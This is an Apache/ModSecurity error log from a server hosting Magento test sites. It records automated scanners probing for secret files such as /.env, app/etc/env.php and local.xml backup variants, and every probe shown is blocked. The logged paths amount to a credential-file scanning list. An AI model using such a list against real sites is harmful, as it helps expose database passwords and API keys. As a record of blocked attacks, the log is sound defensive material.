[Mon Feb 03 14:00:57.750760 2025] [:error] [pid 903429] [client 95.111.244.79:48786] [client 95.111.244.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6C-CT-b1MI6wxyjKb030AAAAAY"]
[Mon Feb 03 14:00:57.751321 2025] [:error] [pid 903429] [client 95.111.244.79:48786] [client 95.111.244.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6C-CT-b1MI6wxyjKb030AAAAAY"]
[Thu Feb 06 03:40:23.181203 2025] [:error] [pid 968041] [client 185.196.220.16:23680] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z6QhF-twQwrZuRH8Nje_SAAAAAc"]
[Thu Feb 06 03:40:23.183056 2025] [:error] [pid 968041] [client 185.196.220.16:23680] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z6QhF-twQwrZuRH8Nje_SAAAAAc"]
[Thu Feb 06 03:40:23.183507 2025] [:error] [pid 968041] [client 185.196.220.16:23680] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z6QhF-twQwrZuRH8Nje_SAAAAAc"]
[Thu Feb 06 03:40:23.440469 2025] [:error] [pid 967677] [client 185.196.220.16:62984] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z6QhF-2kD27RYcl6tSP5VwAAAAM"]
[Thu Feb 06 03:40:23.441045 2025] [:error] [pid 967677] [client 185.196.220.16:62984] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z6QhF-2kD27RYcl6tSP5VwAAAAM"]
[Thu Feb 06 03:40:23.441488 2025] [:error] [pid 967677] [client 185.196.220.16:62984] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z6QhF-2kD27RYcl6tSP5VwAAAAM"]
[Thu Feb 06 03:40:24.235842 2025] [:error] [pid 967679] [client 185.196.220.16:63002] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z6QhGAo34cHMo5DEFNA7YgAAAAU"]
[Thu Feb 06 03:40:24.236502 2025] [:error] [pid 967679] [client 185.196.220.16:63002] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z6QhGAo34cHMo5DEFNA7YgAAAAU"]
[Thu Feb 06 03:40:24.236967 2025] [:error] [pid 967679] [client 185.196.220.16:63002] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z6QhGAo34cHMo5DEFNA7YgAAAAU"]
[Thu Feb 06 03:40:24.437274 2025] [:error] [pid 967678] [client 185.196.220.16:63006] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z6QhGPmiDqsw3PM1XlddigAAAAQ"]
[Thu Feb 06 03:40:24.437799 2025] [:error] [pid 967678] [client 185.196.220.16:63006] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z6QhGPmiDqsw3PM1XlddigAAAAQ"]
[Thu Feb 06 03:40:24.438151 2025] [:error] [pid 967678] [client 185.196.220.16:63006] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z6QhGPmiDqsw3PM1XlddigAAAAQ"]
[Thu Feb 06 03:40:24.584462 2025] [:error] [pid 967676] [client 185.196.220.16:63012] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z6QhGHnq6wD1N8H0koR1PQAAAAI"]
[Thu Feb 06 03:40:24.585259 2025] [:error] [pid 967676] [client 185.196.220.16:63012] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z6QhGHnq6wD1N8H0koR1PQAAAAI"]
[Thu Feb 06 03:40:24.585771 2025] [:error] [pid 967676] [client 185.196.220.16:63012] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z6QhGHnq6wD1N8H0koR1PQAAAAI"]
[Thu Feb 06 03:40:24.783156 2025] [:error] [pid 968039] [client 185.196.220.16:63014] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z6QhGFht-XiLR0Y76LYp0QAAAAY"]
[Thu Feb 06 03:40:24.783402 2025] [:error] [pid 968039] [client 185.196.220.16:63014] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z6QhGFht-XiLR0Y76LYp0QAAAAY"]
[Thu Feb 06 03:40:24.783597 2025] [:error] [pid 968039] [client 185.196.220.16:63014] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z6QhGFht-XiLR0Y76LYp0QAAAAY"]
[Thu Feb 06 03:40:25.033100 2025] [:error] [pid 968042] [client 185.196.220.16:63024] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z6QhGZi0osbP9oWvzMhjegAAAAg"]
[Thu Feb 06 03:40:25.033726 2025] [:error] [pid 968042] [client 185.196.220.16:63024] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z6QhGZi0osbP9oWvzMhjegAAAAg"]
[Thu Feb 06 03:40:25.034168 2025] [:error] [pid 968042] [client 185.196.220.16:63024] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z6QhGZi0osbP9oWvzMhjegAAAAg"]
[Thu Feb 06 03:40:25.228384 2025] [authz_core:error] [pid 968041] [client 185.196.220.16:63030] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Feb 06 03:40:25.410830 2025] [:error] [pid 967677] [client 185.196.220.16:63046] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z6QhGe2kD27RYcl6tSP5WAAAAAM"]
[Thu Feb 06 03:40:25.411418 2025] [:error] [pid 967677] [client 185.196.220.16:63046] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z6QhGe2kD27RYcl6tSP5WAAAAAM"]
[Thu Feb 06 03:40:25.412046 2025] [:error] [pid 967677] [client 185.196.220.16:63046] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z6QhGe2kD27RYcl6tSP5WAAAAAM"]
[Thu Feb 06 16:26:57.061448 2025] [authz_core:error] [pid 967676] [client 185.165.171.109:51152] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php2, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.111258 2025] [authz_core:error] [pid 968041] [client 185.165.171.109:51168] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpbackup, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.165594 2025] [authz_core:error] [pid 968042] [client 185.165.171.109:51182] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_old, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.188283 2025] [authz_core:error] [pid 967678] [client 185.165.171.109:51126] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_1, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.205540 2025] [authz_core:error] [pid 967674] [client 185.165.171.109:51158] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_backup, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.208370 2025] [authz_core:error] [pid 967675] [client 185.165.171.109:51136] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.224573 2025] [authz_core:error] [pid 967679] [client 185.165.171.109:51138] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_back, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.235637 2025] [authz_core:error] [pid 967676] [client 185.165.171.109:51186] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_new, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.279195 2025] [authz_core:error] [pid 968041] [client 185.165.171.109:51188] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_live, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:26:57.437492 2025] [authz_core:error] [pid 967678] [client 185.165.171.109:51192] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.live, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:06.828386 2025] [authz_core:error] [pid 967679] [client 185.165.171.109:51232] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_bak, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:06.842485 2025] [authz_core:error] [pid 967675] [client 185.165.171.109:51216] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:06.858992 2025] [authz_core:error] [pid 967676] [client 185.165.171.109:51310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.backup, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.004499 2025] [authz_core:error] [pid 968041] [client 185.165.171.109:51244] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.back, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.031728 2025] [authz_core:error] [pid 967677] [client 185.165.171.109:51350] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.new, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.037695 2025] [authz_core:error] [pid 967678] [client 185.165.171.109:51206] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php1, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.052627 2025] [authz_core:error] [pid 967674] [client 185.165.171.109:51296] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.bak, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.061667 2025] [authz_core:error] [pid 968042] [client 185.165.171.109:51272] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpbak, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.067739 2025] [authz_core:error] [pid 980162] [client 185.165.171.109:51260] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.bk, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.068063 2025] [authz_core:error] [pid 968039] [client 185.165.171.109:51234] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_2, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.581656 2025] [authz_core:error] [pid 967679] [client 185.165.171.109:51356] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.old, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.730621 2025] [authz_core:error] [pid 967676] [client 185.165.171.109:51358] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_test, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.754826 2025] [authz_core:error] [pid 968041] [client 185.165.171.109:51288] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpbk, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.835936 2025] [authz_core:error] [pid 980163] [client 185.165.171.109:51280] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_bk, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.842271 2025] [authz_core:error] [pid 980164] [client 185.165.171.109:51330] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_staging, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.858618 2025] [authz_core:error] [pid 967677] [client 185.165.171.109:51342] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.test, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.876914 2025] [authz_core:error] [pid 967675] [client 185.165.171.109:51386] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.local, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.884691 2025] [authz_core:error] [pid 967678] [client 185.165.171.109:51338] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php_local, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.932284 2025] [authz_core:error] [pid 967674] [client 185.165.171.109:51322] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpback, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:07.935447 2025] [authz_core:error] [pid 968042] [client 185.165.171.109:51370] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php.staging, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:08.332395 2025] [authz_core:error] [pid 968039] [client 185.165.171.109:57272] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml2, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:13.076819 2025] [authz_core:error] [pid 968042] [client 185.165.171.109:57280] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phpold, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:13.150776 2025] [authz_core:error] [pid 967679] [client 185.165.171.109:57298] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phplive, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:14.048386 2025] [authz_core:error] [pid 967676] [client 185.165.171.109:57324] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_bak, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:14.700168 2025] [authz_core:error] [pid 980163] [client 185.165.171.109:57296] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.phptest, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:14.840170 2025] [authz_core:error] [pid 980164] [client 185.165.171.109:57316] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_backup, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:15.035603 2025] [authz_core:error] [pid 967675] [client 185.165.171.109:57378] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlbackup, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:15.054462 2025] [authz_core:error] [pid 967677] [client 185.165.171.109:57358] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.back, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:15.148664 2025] [authz_core:error] [pid 967678] [client 185.165.171.109:57338] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.backup, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:15.154482 2025] [authz_core:error] [pid 968039] [client 185.165.171.109:57310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml_back, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:15.157207 2025] [authz_core:error] [pid 967674] [client 185.165.171.109:57364] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.bak, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:15.521397 2025] [authz_core:error] [pid 968042] [client 185.165.171.109:57352] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.bk, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:16.607166 2025] [authz_core:error] [pid 967679] [client 185.165.171.109:57382] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.live, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:16.615905 2025] [authz_core:error] [pid 967676] [client 185.165.171.109:57390] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml.staging, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:16.707793 2025] [authz_core:error] [pid 980163] [client 185.165.171.109:57404] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlold, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:16.892719 2025] [authz_core:error] [pid 980164] [client 185.165.171.109:54312] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlnew, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:18.442738 2025] [authz_core:error] [pid 967675] [client 185.165.171.109:54318] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlbak, referer: https://economiasolidale.38121.it/
[Thu Feb 06 16:27:18.683705 2025] [authz_core:error] [pid 967677] [client 185.165.171.109:54322] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xmlbk, referer: https://economiasolidale.38121.it/
